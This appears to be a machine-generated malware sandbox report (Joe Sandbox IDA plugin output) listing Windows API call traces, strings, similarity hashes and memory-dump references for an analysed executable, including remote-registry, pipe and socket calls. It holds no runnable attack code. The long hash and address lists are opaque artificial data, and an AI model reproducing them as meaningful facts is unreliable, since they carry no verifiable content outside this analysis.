                                                                                                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: d4129f918cf141e38fc65374db3392735c63baad2374797cd27d85bac8b8d16f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0230b9c1c0fd9f386aa1fe28f68fe51e168b74c33f7e7eb5f612a5309aa6246a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4129f918cf141e38fc65374db3392735c63baad2374797cd27d85bac8b8d16f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54219572600219AF9F10DFA8CC88CBB77ACEF09360B44C525F90ADB290DB74DC468760
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A781A9
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A781CF
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00A781D2
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32 ref: 00A781F3
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 00A781FC
                                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00A78216
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00A78224
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 15de8871e0f59f52699f03703e8d4e9ad1281eff7135313eaa0d048258a818f9
                                                                                                                                                                                                                                                                                                    • Instruction ID: db58af97f70e2ce66a8ef79f68c73d1a9e056a8e2c3343a39135514ca804ec09
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15de8871e0f59f52699f03703e8d4e9ad1281eff7135313eaa0d048258a818f9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5217471600105BF9B10DBF8DC89DAAB7ECEB09360B04C125F919CB1A1DB74EC42C764
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00A80E99
                                                                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A80ED5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00A80F6D
                                                                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A80FA8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A178B1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17873: GetStockObject.GDI32(00000011), ref: 00A178C5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A178CF
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AA4BB0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AA4BBD
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AA4BC8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AA4BD7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AA4BE3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A4DB23: _free.LIBCMT ref: 00A4DB4C
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DBAD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4), ref: 00A42D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: GetLastError.KERNEL32(00AE1DC4,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4,00AE1DC4), ref: 00A42D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DBB8
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DBC3
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DC17
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DC22
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DC2D
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DC38
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A7E328
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00A7E32F
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A7E345
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00A7E34C
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A7E390
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00A7E36D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                                    • Opcode ID: 508bcc094ed5f669f0055a1d1e0465293593e1412c8121425ba3b8ebbfe22a12
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3d8a1c3cc208e8aa3dcb2f4b8d95502a81de109f6138e3bc93ddf74e6e268780
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 508bcc094ed5f669f0055a1d1e0465293593e1412c8121425ba3b8ebbfe22a12
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B0162F29002097FE751DBE48D89EEA776CDB09301F408591B78AE6481E7749E854B71
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00A81322
                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?), ref: 00A81334
                                                                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 00A81342
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A81350
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A8135F
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A8136F
                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00A81376
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 368305fb508f12155b4992e5ec4eec5d9f3b8cf5b9d97ddb443feb4f8323ae1b
                                                                                                                                                                                                                                                                                                    • Instruction ID: c32c8023c081f6f0cf5f9dfadb1062652944a0de0cea1c7430aa15bba1885400
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 368305fb508f12155b4992e5ec4eec5d9f3b8cf5b9d97ddb443feb4f8323ae1b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F0EC32042612BBD781AB94EE49BD6FB39FF46302F401521F24295CE08B749476DF90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A9281D
                                                                                                                                                                                                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A9283E
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A9284F
                                                                                                                                                                                                                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00A92938
                                                                                                                                                                                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00A928E9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7433E: _strlen.LIBCMT ref: 00A74348
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A93C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00A8F669), ref: 00A93C9D
                                                                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 00A92992
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 867e16ac23f089c4e36d84887704ef70ade69d2a7d17b59664df0382ad0d0906
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8515a4c2f44a266698d19cd4ce3d246a66c6bd4f3f0ddfe6c1b1d72a5aefd38a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 867e16ac23f089c4e36d84887704ef70ade69d2a7d17b59664df0382ad0d0906
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBB1E135604300AFD724DF64C885F6ABBE5AF88318F54854CF49A5B2E2DB31ED82CB91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00A4042A
                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A40446
                                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00A4045D
                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A4047B
                                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00A40492
                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A404B0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 101bf1ed6dab3c5c2311173adfb0c439c77e236935f24db558592c8d9cdc7c84
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4481E879A007059BE720AF79CD42F6A77E8AFD5324F24412AF711DB681E770E9009794
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A38649,00A38649,?,?,?,00A467C2,00000001,00000001,8BE85006), ref: 00A465CB
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A467C2,00000001,00000001,8BE85006,?,?,?), ref: 00A46651
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A4674B
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00A46758
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A36A79,?,0000015D,?,?,?,?,00A385B0,000000FF,00000000,?,?), ref: 00A43BC5
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00A46761
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00A46786
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6b6be7d0f06f39bb3ecf1ad937872fb8656b2456884ed5d64f7e3675fb141157
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8db0f03ee6f82cc9707e22b74796ec3f64a34b6bfc81686e8f2e630a1d94d0a1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b6be7d0f06f39bb3ecf1ad937872fb8656b2456884ed5d64f7e3675fb141157
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51F176600206AFEB258F64CD81FBF77AAEFC2754F154669FC05D6140EB34DC5086A2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A9C10E,?,?), ref: 00A9D415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A9C72A
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A9C785
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00A9C7CA
                                                                                                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A9C7F9
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A9C853
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00A9C85F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8a545b04b9743704fe844210e9e3606bb28748e600c1f0e8ed5498ec98c805c8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 29604d2a8ea341e1f4de392f96efd6b576d28bb4d728872f2bd18c1a0df4f9b4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a545b04b9743704fe844210e9e3606bb28748e600c1f0e8ed5498ec98c805c8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC81A070208641AFCB14DF64C985E6ABBF5FF84318F14895CF4964B2A2DB31ED46CB92
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(00000035), ref: 00A700A9
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00A70150
                                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(00A70354,00000000), ref: 00A70179
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(00A70354), ref: 00A7019D
                                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(00A70354,00000000), ref: 00A701A1
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A701AB
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
